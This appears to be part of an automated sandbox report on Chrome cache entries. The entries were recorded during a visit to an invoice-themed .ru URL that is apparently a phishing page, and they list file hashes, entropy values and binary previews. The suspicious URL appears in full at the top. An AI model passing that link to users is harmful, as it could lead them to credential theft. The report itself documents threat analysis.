                                                                                                                                              URL:https://2025_notificationx1invoice_review.fmhjhctk.ru/op328rcsbOGBUSeGtzq25hcrvpTsZOfghsLFQq1ELO8tMocL4jZef199
                                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill="#404040"/></svg>

                                                                                                                                              Chrome Cache Entry: 231

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):17842
                                                                                                                                              Entropy (8bit):7.821645806304586
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:EwTZQ74B48VtrMvbt0sAvPTMaf+j5s8OYbqarRbjy5Qg1AR/kf63z/:hTa4B4mtYztAvPTMFhOYb3Rbu571AJa6
                                                                                                                                              MD5:4B52ECDC33382C9DCA874F551990E704
                                                                                                                                              SHA1:8F3BF8E41CD4CDDDB17836B261E73F827B84341B
                                                                                                                                              SHA-256:CCE050CC3B150C0B370751021BB15018EE2B64AC369E230FE3B571A9B00D4342
                                                                                                                                              SHA-512:AC3D3C82BAD9147AE5F083ED49C81A744F672DDFBB262135AA3F2C6601F8DFFEA11D8E323CEF025C36D76C6F2515AA6814B622CF504CA01D13346E9EA989048F
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:RIFF.E..WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH.,...$.m.8..k.\.oDL.. ..TU....3'.{.g..6..2...6.DL`e..."&@..b.#&@......T.....'.....$......1.d...G........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........._...........................?...Z5[...B,.c...V-...m.0.../..?...............?.......?................_.....-...M.B.....=....C...[......w .X...ea.............VW.?b....[[.o^.Y.K...OD

                                                                                                                                              Chrome Cache Entry: 232

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):128
                                                                                                                                              Entropy (8bit):4.750616928608237
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:CaSbcCq9EKVEkxhZJSh3EkEkkcJSh3EkEkki3kx+BR0:PSbzqyKVEkxzQ7QDw+R0
                                                                                                                                              MD5:D90F02F133E7B82AF89B3E58526AC459
                                                                                                                                              SHA1:F1D6D47EFE0D920F5BC5024E813554BD2F8A1650
                                                                                                                                              SHA-256:FCF0826E3EA7D24F6C73417BFF62AD84191ECC837DBFB10E60A2547580C3C14D
                                                                                                                                              SHA-512:83C187216CE1B44E23000DF4F25A4BAA7C5E0066E62C3E0D0203B013B5C26D097C6B225C58E345204B47E5E7BF34D4A8E60F7DF63D6083157C6CB9707DD9C41E
                                                                                                                                              Malicious:false
                                                                                                                                              URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIgCaKGK8xrGdvCEgUNX1f-DRIFDRObJGMhF09ro7NoPB8SSgkg9maP8teUrhIFDc8jKv8SBQ3Fk8QkEgUNiaVnyxIFDcMZOZASBQ2JpWfLEgUNwxk5kBIFDdACQOwSBQ2oXeN0IenvvDpL8T7C?alt=proto
                                                                                                                                              Preview:ChIKBw1fV/4NGgAKBw0TmyRjGgAKSAoHDc8jKv8aAAoHDcWTxCQaAAoHDYmlZ8saAAoHDcMZOZAaAAoHDYmlZ8saAAoHDcMZOZAaAAoHDdACQOwaAAoHDahd43QaAA==